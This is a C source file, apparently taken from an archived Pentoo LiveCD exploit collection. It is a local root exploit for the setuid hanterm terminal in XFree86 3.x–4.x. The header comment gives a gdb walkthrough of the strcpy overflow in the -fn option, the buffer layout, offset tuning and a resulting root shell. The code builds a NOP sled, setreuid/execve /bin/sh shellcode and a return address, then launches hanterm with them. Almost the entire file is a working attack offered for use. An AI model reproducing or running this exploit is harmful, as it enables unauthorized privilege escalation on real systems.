home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / xwin / 0x82-Local.hanterm.exploit.c < prev    next >
Encoding:
C/C++ Source or Header  |  2005-02-12  |  4.7 KB  |  170 lines
  1. /*
  2. **
  3. ** How to exploit?
  4. **
  5. ** [x82@xpl017elz x82]$ cp /usr/X11R6/bin/hanterm .
  6. ** [x82@xpl017elz x82]$ gdb -q hanterm
  7. ** (no debugging symbols found)...(gdb) r -display 61.xx.177.27:0 -fn `perl -e
  8. ** 'print "x"x80'`
  9. **  
  10. ** Starting program: /home/noname/hanterm -display 61.xx.177.27:0 -fn `perl -e
  11. ** 'print "x"x80'`
  12. ** (no debugging symbols found)...(no debugging symbols found)...
  13. ** (no debugging symbols found)...(no debugging symbols found)...
  14. ** (no debugging symbols found)...(no debugging symbols found)...
  15. ** (no debugging symbols found)...
  16. ** Program received signal SIGSEGV, Segmentation fault.
  17. ** 0x80520e6 in strcpy () at ../sysdeps/generic/strcpy.c:30
  18. ** 30      ../sysdeps/generic/strcpy.c: ▒╫╖▒ ╞─└╧└╠│¬ ╡≡╖║┼Σ╕«░í ╛°└╜.
  19. ** (gdb) info reg $esp
  20. ** esp            0xbfffe6b8       -1073748296
  21. ** (gdb) x/80 0xbffffb00
  22. ** 0xbffffb00:     0x65746e61      0x2d006d72      0x70736964      0x0079616c
  23. ** 0xbffffb10:     0x332e3136      0x37312e37      0x37322e37      0x2d00303a
  24. ** 0xbffffb20:     0x78006e66      0x78787878      0x78787878      0x78787878
  25. ** 0xbffffb30:     0x78787878      0x78787878      0x78787878      0x78787878
  26. ** 0xbffffb40:     0x78787878      0x78787878      0x78787878      0x78787878
  27. ** 0xbffffb50:     0x78787878      0x78787878      0x78787878      0x78787878
  28. ** 0xbffffb60:     0x78787878      0x78787878      0x78787878      0x78787878
  29. ** 0xbffffb70:     0x00787878      0x5353454c      0x4e45504f      0x656c7c3d
  30. **     ...             ...            ...              ...             ...
  31. ** 0xbffffc10:     0x2d2a2d36      0x3563736b      0x2e313036      0x37383931
  32. ** 0xbffffc20:     0x2d2c302d      0x6f6b2d2a      0x2d676964      0x6964656d
  33. ** 0xbffffc30:     0x722d6d75      0x726f6e2d      0x2d6c616d      0x2d38312d
  34. ** (gdb)                
  35. ** 
  36. ** Buffer Structure
  37. **
  38. ** [ data addr: 80byte ] + [ ebp addr: 4byte ] + [ ret addr: 4byte ] = 88byte
  39. **
  40. ** The return until the address the whole it contains and,
  41. ** it puts in an option. 
  42. **
  43. ** [x82@xpl017elz x82]$ ./exploit
  44. ** 
  45. ** XFree86 Version 3.x.x ~ 4.x.x /usr/X11R6/bin/hanterm exploit
  46. ** Default: [ data addr ] + [ ebp addr ] + [ ret addr ] = 88byte
  47. ** 
  48. **                         Exploit made by Xpl017Elz
  49. ** 
  50. ** Display HOST_IP: 255.255.255.255:0
  51. ** Jumping Address: 0xbffffb74
  52. ** 
  53. ** Segmentation fault
  54. ** [x82@xpl017elz x82]$  
  55. **
  56. ** It calculates the offset. 
  57. ** Namely, when 0xbffffb20 from 0xbffffb70 until it catches in between, 
  58. ** it will be suitable.
  59. **
  60. ** [x82@xpl017elz x82]$ ./exploit -a 61.xx.177.27:0 -o 2370 -b 88
  61. ** 
  62. ** XFree86 Version 3.x.x ~ 4.x.x /usr/X11R6/bin/hanterm exploit
  63. ** Default: [ data addr ] + [ ebp addr ] + [ ret addr ] = 88byte
  64. ** 
  65. **                         Exploit made by Xpl017Elz
  66. ** 
  67. ** Display HOST_IP: 61.xx.177.27:0
  68. ** Jumping Address: 0xbffffb26
  69. ** 
  70. ** bash#        
  71. **
  72. ** Ooops! it's rootshell :-)
  73. **
  74. ** exploit by "you dong-hun"(Xpl017Elz), <szoahc@hotmail.com>. 
  75. ** My World: http://x82.i21c.net
  76. **
  77. */
  78.  
  79. #include <stdio.h>
  80. #include <stdlib.h>
  81.  
  82. #define NOP 0x90
  83. #define DFOFS 2400 
  84. #define DFIP "255.255.255.255:0"
  85. #define DFBUF 88 
  86.  
  87. /*
  88. ** [ data addr: 80byte ] + [ ebp addr: 4byte ] + [ ret addr: 4byte ] = 88byte
  89. */
  90.  
  91. char shellcode[] = /* 53byte shellcode */
  92. "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80" /* setreuid(0,0); */
  93. "\xeb\x1d\x5e\x89\x76\x08\x31\xc0\x88\x46"
  94. "\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e"
  95. "\x08\x31\xd2\xcd\x80\xb0\x01\x31\xdb\xcd"
  96. "\x80\xe8\xde\xff\xff\xff/bin/sh";
  97.  
  98. unsigned long sp(void) {
  99. __asm__("movl %esp,%eax");
  100. }
  101.  
  102. main(int argc, char *argv[]) {
  103.  
  104. int rufp, fpru, jobst,
  105.     ferbuf, num=DFBUF,
  106.     ofs=DFOFS;
  107.  
  108. long addr;
  109.  
  110. char buffer[2000],
  111.      hoip[] = DFIP;
  112.  
  113. extern char *optarg;
  114.  
  115. banrl();
  116.  
  117. while ((jobst = getopt(argc, argv, "a:o:b:")) !=EOF)
  118. switch (jobst) {
  119. case 'a': strcpy(hoip, optarg);
  120. break;
  121. case 'o': ofs = atoi(optarg);
  122. break;
  123. case 'b': num = atoi(optarg);
  124. break;
  125. case '?': usages(argv[0]); 
  126. exit(0);
  127. }
  128.  
  129. printf(" Display HOST_IP: %s\n",hoip);
  130. addr = sp() +ofs; // -ofs;
  131. printf(" Jumping Address: %p\n\n",addr); 
  132. ferbuf = num - sizeof(shellcode) -4;
  133.  
  134. bzero(&buffer,2000);
  135. for(rufp=0; rufp<=ferbuf; rufp++) {
  136. buffer[rufp] = NOP;
  137. }
  138.  
  139. for(fpru=0; fpru<=52; fpru++) {
  140. buffer[rufp++] = shellcode[fpru];
  141. }
  142. buffer[rufp++] =     addr & 0xff;
  143. buffer[rufp++] = addr>> 8 & 0xff;
  144. buffer[rufp++] = addr>>16 & 0xff;
  145. buffer[rufp++] = addr>>24 & 0xff;
  146.  
  147. execl("/usr/X11R6/bin/hanterm", "hanterm",
  148. "-display", hoip, "-fn", buffer, NULL);  
  149.  
  150. exit(0);
  151.  
  152. }
  153.  
  154. usages(char *var) {
  155.  
  156. printf("\n Usage:\n
  157.  %s -a [host_ip:0] -o [offset] -b [buffer size] (data addr~ return addr)\n",var);
  158. printf(" Default: %s -a 61.xx.177.27:0 -o 2400 -b 88\n\n",var); 
  159.  
  160. }
  161.  
  162. banrl() {
  163.  
  164. printf("\n XFree86 Version 3.x.x ~ 4.x.x /usr/X11R6/bin/hanterm exploit\n");
  165. printf(" Default: [ data addr ] + [ ebp addr ] + [ ret addr ] = 88byte\n\n");
  166. printf("\t\t\t Exploit made by Xpl017Elz\n\n");
  167.  
  168. }
  169.  
  170.